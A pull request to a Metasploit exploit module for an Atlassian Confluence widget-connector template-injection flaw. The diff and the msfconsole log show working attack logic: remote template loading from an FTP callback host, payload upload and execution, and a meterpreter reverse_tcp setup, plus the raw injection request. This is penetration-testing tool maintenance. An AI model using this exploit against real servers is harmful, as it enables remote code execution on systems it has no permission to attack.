### PR TITLE
Make SRVHOST the callback address in confluence_widget_connector

### DIFF
--- a/documentation/modules/exploit/multi/http/confluence_widget_connector.md
+++ b/documentation/modules/exploit/multi/http/confluence_widget_connector.md
@@ -15,8 +15,6 @@ Affecting Atlassian Confluence before version 6.6.12, from version 6.7.0 before 
 
 # Verification Steps
 
-List the steps needed to make sure this thing works
-
 - [ ] Setting up a working installation of Atlassian Confluence before 6.6.13, 6.12.3, 6.12.3 or 6.14.2.
 - [ ] Start `msfconsole`
 - [ ] `use exploit/multi/http/confluence_widget_connector`
@@ -30,7 +28,7 @@ List the steps needed to make sure this thing works
 
 # Options
 - **TARGETURI**: Path to Atlassian Confluence installation ("/" is the default)
-- **TRIGGERURL**: Url to external video service to trigger vulnerability ("https://www.youtube.com/watch?v=dQw4w9WgXcQ" is the default)
+- **TRIGGERURL**: Url to external video service to trigger vulnerability ("https://www.youtube.com/watch?v=kxopViU98Xo" is the default)
 
 # Scenario
 ## Tested on Confluence 6.8.2 with Windows target

--- a/modules/exploits/multi/http/confluence_widget_connector.rb
+++ b/modules/exploits/multi/http/confluence_widget_connector.rb
@@ -428,7 +428,7 @@ class MetasploitModule < Msf::Exploit::Remote
     start_service
 
     target_platform = get_target_platform
-    if target_platform.nil?
+    if target_platform.empty?
       fail_with(Failure::Unreachable, 'Target did not respond to OS check.  Confirm RHOSTS and RPORT, then run "check".')
     else
       print_status("Target being detected as: #{target_platform}")

--- a/modules/exploits/multi/http/confluence_widget_connector.rb
+++ b/modules/exploits/multi/http/confluence_widget_connector.rb
@@ -60,9 +60,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options(
       [
+        OptAddress.new('SRVHOST', [true, 'Callback address for template loading']),
         OptString.new('TARGETURI', [true, 'The base to Confluence', '/']),
         OptString.new('TRIGGERURL', [true, 'Url to external video service to trigger vulnerability',
-          'https://www.youtube.com/watch?v=dQw4w9WgXcQ'])
+          'https://www.youtube.com/watch?v=kxopViU98Xo'])
       ])
   end
 
@@ -182,7 +183,7 @@ class MetasploitModule < Msf::Exploit::Remote
       start_service
 
       @check_text = Rex::Text.rand_text_alpha(5..10)
-      res = inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}check.vm")
+      res = inject_template("ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}check.vm")
       if res && res.body && res.body.include?(@check_text)
         checkcode = Exploit::CheckCode::Vulnerable
       end
@@ -247,7 +248,7 @@ class MetasploitModule < Msf::Exploit::Remote
   # @return [String]
   def get_java_property(prop)
     @prop = prop
-    res = inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}javaprop.vm")
+    res = inject_template("ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}javaprop.vm")
     if res && res.body
       return clear_response(res.body)
     end
@@ -304,7 +305,7 @@ class MetasploitModule < Msf::Exploit::Remote
       @command = "cmd.exe /C copy #{fname} #{new_fname}"
     end
 
-    inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm")
+    inject_template("ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}exec.vm")
   end
 
   # Returns the normalized file path for payload.
@@ -354,10 +355,10 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     print_status("Attempting to upload #{@fname}")
-    inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm")
+    inject_template("ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}upload.vm")
 
     print_status("Attempting to execute #{@fname}")
-    inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm", timeout=5)
+    inject_template("ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}exec.vm", timeout=5)
   end
 
 
@@ -379,14 +380,14 @@ class MetasploitModule < Msf::Exploit::Remote
     register_files_for_cleanup(@fname, new_fname)
 
     print_status("Attempting to upload #{@fname}")
-    inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm")
+    inject_template("ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}upload.vm")
 
     print_status("Attempting to copy payload to #{new_fname}")
     get_dup_file_code(@fname, new_fname)
 
     print_status("Attempting to execute #{new_fname}")
     @command = new_fname
-    inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm", timeout=5)
+    inject_template("ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}exec.vm", timeout=5)
   end
 
 
@@ -406,17 +407,17 @@ class MetasploitModule < Msf::Exploit::Remote
     register_files_for_cleanup(@fname, new_fname)
 
     print_status("Attempting to upload #{@fname}")
-    inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm")
+    inject_template("ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}upload.vm")
 
     @command = "chmod +x #{@fname}"
-    inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm")
+    inject_template("ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}exec.vm")
 
     print_status("Attempting to copy payload to #{new_fname}")
     get_dup_file_code(@fname, new_fname)
 
     print_status("Attempting to execute #{new_fname}")
     @command = new_fname
-    inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm", timeout=5)
+    inject_template("ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}exec.vm", timeout=5)
   end
 
   def exploit


### PR DESCRIPTION
Fixes #12012. Please read that issue for repro.

Note that this also fixes the `target_platform` check: an empty string is returned, not `nil`.

```
msf5 exploit(multi/http/confluence_widget_connector) > run

[-] Exploit failed: The following options failed to validate: SRVHOST.
[*] Exploit completed, but no session was created.
msf5 exploit(multi/http/confluence_widget_connector) > options

Module options (exploit/multi/http/confluence_widget_connector):

   Name        Current Setting                              Required  Description
   ----        ---------------                              --------  -----------
   PASVPORT    0                                            no        The local PASV data port to listen on (0 is random)
   Proxies                                                  no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS      127.0.0.1                                    yes       The target address range or CIDR identifier
   RPORT       8090                                         yes       The target port (TCP)
   SRVHOST                                                  yes       Callback address for template loading
   SRVPORT     8021                                         yes       The local port to listen on.
   SSL         false                                        no        Negotiate SSL for incoming connections
   SSLCert                                                  no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI   /                                            yes       The base to Confluence
   TRIGGERURL  https://www.youtube.com/watch?v=kxopViU98Xo  yes       Url to external video service to trigger vulnerability
   VHOST                                                    no        HTTP server virtual host


Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  127.0.0.1        yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Java


msf5 exploit(multi/http/confluence_widget_connector) > set srvhost 127.0.0.1
srvhost => 127.0.0.1
msf5 exploit(multi/http/confluence_widget_connector) > set httptrace true
httptrace => true
msf5 exploit(multi/http/confluence_widget_connector) > run

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444
[*] Starting the FTP server.
[*] Started service listener on 127.0.0.1:8021
********************
####################
# Request:
####################
POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: 127.0.0.1:8090
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Accept: */*
Origin: http://127.0.0.1:8090/
Content-Type: application/json; charset=UTF-8
Content-Length: 168

{"contentId":"1","macro":{"name":"widget","body":"","params":{"url":"https://www.youtube.com/watch?v=kxopViU98Xo","_template":"ftp://127.0.0.1:8021/lHmYHjavaprop.vm"}}}
[-] The connection was refused by the remote host (127.0.0.1:8090).
[!] Connection timed out in #inject_template
[-] Exploit aborted due to failure: unreachable: Target did not respond to OS check.  Confirm RHOSTS and RPORT, then run "check".
[*] Server stopped.
[*] Exploit completed, but no session was created.
msf5 exploit(multi/http/confluence_widget_connector) >
```